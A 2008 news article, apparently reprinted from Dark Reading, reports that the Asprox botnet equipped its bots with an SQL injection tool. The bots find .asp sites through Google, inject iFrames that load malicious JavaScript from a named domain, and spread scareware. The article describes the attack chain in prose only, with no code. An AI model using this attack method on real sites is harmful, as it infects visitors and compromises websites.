Bots Use SQL Injection Tool in New Web Attack

May 14, 2008 – 3:56 PM

A little-known botnet has put a different spin on the recent wave of SQL injection attacks on thousands of Websites: It’s outfitting its bots with its own tool to launch SQL injection attacks on vulnerable sites.

The Asprox botnet, a relatively small botnet known mainly for sending phishing emails, has been spotted in the last few days installing an SQL injection attack tool on its bots. The bots then Google for .asp pages with specific terms — and then hit the sites found in the search return with SQL injection attacks, says Joe Stewart, director of malware research for SecureWorks, who has documented his findings on the attack.

Stewart says the Asprox botnet’s SQL injection attack is likely a copycat of the recent SQL injection Website attacks from China, which deliver a Trojan that steals online gaming passwords. But this is the first SQL injection attack Stewart has seen using a botnet and a toolkit to do the dirty work. Asprox so far has infected over 1,000 Websites this way, he says.

“I’ve seen bots get other types of infection tools, but not SQL injection” tools, Stewart says. “It’s almost like they noticed the Chinese[-based] attack and copied their code into their own binary for their own attack… The hacks are so similar to the way the other SQL injection attacks are going.”

The attack injects an iFrame into the Website, which then infects visitors with a malicious JavaScript file from the “direct84.com” domain.

Several researchers, including IBM ISS’s X-Force team and Fortify Software, have witnessed copycat SQL injection Website attacks in recent days. “These [SQL injection Website attacks] are not orchestrated together. They are very opportunistic,” says Jacob West, manager of the security research group at Fortify.

Asprox, meanwhile, is also recruiting new bots in its attack — when a user visits a site infected by Asprox via SQL injection, he or she ends up infected with Asprox botware. Unbeknownst to the user, his or her, machine could, in turn, receive a download of the SQL injection toolkit to continue the cycle. “This has potential to spread like a worm,” Stewart says.

“Its purpose is to infect Websites, and then recruit more bots,” he says. SecureWorks had Asprox at about 15,000 bots last month, but is recounting the botnet to see how much this new attack vector is expanding the botnet.

Asprox has also thrown in some “scareware” for good measure. “It sends out its spam, but also… posts a warning that there’s spyware found on your computer, [so you should] download this to get rid of it,” Stewart says. “You have to pay for it, so they get your credit card information, too. It’s some additional income on the side,” although the scareware appears to be handled more by an affiliate than by Asprox itself, he says.

Why this particular botnet-borne SQL injection attack? “It’s a new attack vector. It gives them a way to expand their gene pool” and to get a lot bigger, Stewart says. “If you’re a spamming botnet and you spread mainly by emailing links to get users to click on them, you’re always limited to the pool of email addresses you’re already spamming.

“This gives you a fresh set of bots,” he says.

Stewart says Asprox operators are trying to expand the botnet to compete more strongly with others for a piece of the action. “This botnet is emerging and trying to compete,” he says.

Source: Dark Reading

You must be logged in to post a comment.